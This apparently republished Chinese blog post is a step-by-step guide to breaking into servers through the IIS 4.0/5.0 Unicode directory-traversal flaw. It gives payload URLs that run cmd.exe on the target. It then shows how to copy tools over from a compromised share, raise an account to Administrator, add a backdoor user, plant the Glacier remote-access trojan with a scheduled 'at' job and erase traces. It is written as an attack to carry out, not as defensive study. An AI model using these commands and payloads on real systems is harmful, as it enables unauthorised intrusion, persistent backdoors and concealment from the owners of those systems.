unicode漏洞利用全攻略

by 无用君
  IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在的安全漏洞已经成为了黑客们忠爱的漏洞之一,有希望成为2000年最大的漏洞之一。在此向发现此漏洞的中联绿盟成员袁哥及想出利用映射网络盘方法来解决文件上传问题的l uandao2000致敬。好了,开工吧!

首先是要找到一台带有共享盘的肉鸡,然后将其共享盘映射会本地。找带共享盘的主机不是很难,用国产的黑客软件网络刺客就可以了,在网络刺客中“主机资源”菜单里找“扫描共享主机”,然后填写启始i p和结束ip以后按扫描就,去看会儿电视,再回来看看扫描到没有。没扫描到再换个地址试试,扫描到了的话就可以把他用共享资源菜单中的“影射指定网络盘”把他影射为自己主机的任意一个盘上。
下面的工作就是把工具copy到肉鸡上,假设对方的共享盘为E,ip为127.1.1.2,我们把它影射到了F盘上。现在我们需要copy
自己C盘下的gasys.dll、cmd.exe和getadmin.exe到对方的E盘下,可以到DOS下输入:
C:/"gt;copy c:/gasys.dll F:/

C:/"gt;copy c:/cmd.exe F:/

C:/"gt;copy c:/getadmin.exe F:/

至此为止,肉鸡已经搞定了。现在我们要象主目标进行攻击了。假设对方网站的ip是127.1.1.1,先要把cmd.exe复制到scripts的目录下面,并且要改名,假设对方的物理盘为E : http://127.1.1.1/scripts/..?../winnt/system32/cmd.exe?/c copy e:/winnt/system32/cmd.exe e:/inetpub/scripts/hackercn .exe
这样我们就已经把cmd.exe复制到了scripts的目录下,并改名为hackercn.exe。现在我们要用它把我们肉鸡上的E盘影射为这个网站服务器上的Y 盘: http://127.1.1.1/scripts/hackercn.exe?/c net use Y: //127.1.1.2/E
然后把我们copy过去的那3个文件再copy到网站服务器上(cmd.exe虽然刚才已经copy过去了,但因为改了名,所以还要再copy一次): http://127.1.1.1/scripts/..?../winnt/system32/cmd.exe?/c copy Y:/gasys.dll d:/inetpub/scripts/gasys.dll http://127.1.1.1/scripts/..?../winnt/system32/cmd.exe?/c copy Y:/cmd.exe d:/inetpub/scripts/cmd.exe http://127.1.1.1/scripts/..?../winnt/system32/cmd.exe?/c copy Y:/getadmin.exe d:/inetpub/scripts/getadmin.exe

好了,现在我们需要把“IUSR_计算机名”这个帐号升级为Administrator(并不是每个站点都有“IUSR_计算机名”这个帐号)。假设这台计算机名为“S ERVERS”,那么我们可以这样做: http://127.1.1.1/scripts/getadmin.exe?IUSR_SERVERS
这样所有的访问者都有了Administrator限权,然后我们再来新建一个用户名为hacker密码为password的用户: http://127.1.1.1/cgi-bin/cmd.exe?/c c:/winnt/system32/net.exe user hacker password /add
然后再把它授予Administrator限权: http://127.1.1.1/scripts/getadmin.exe?hacker

下来就是进入该系统并制作后门了:
在nt的dos下输入
C:/"gt;net use //127.1.1.1/ipc$ "quot;password"quot; /user:"quot;hacker"quot;
现在你已经登陆到了他的主机上,然后上传木马冰河:
C:/"gt;copy C:/unzipped/newglacier/G_Server.exe //127.1.1.1/admin$/system32
然后用net time来获得对方的时间:
C:/"gt;net time //127.1.1.1
假设对方的时间是5点40,那么我们将在5点43启动冰河程序:
C:/"gt;at //127.1.1.1 05:43 G_Server.exe

这样我们就完整的实现了一次入侵,别忘了最后要打扫战场。用冰河删除我们上传过的东西。在“开始”菜单中的“程序”菜单里用“管理工具”中“域用户管理器”的“菜单用户”里选“选择域”,然后输入/ /127.1.1.1,然后还原我们做过手脚的用户。

剩下的事就可以用我们植入的冰河来干了。当然,不见得总会那么走运,在入侵中还会碰到最开始copy文件限权不够等等问题,这就需要大家开动脑筋来解决了。祝各位好运!

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值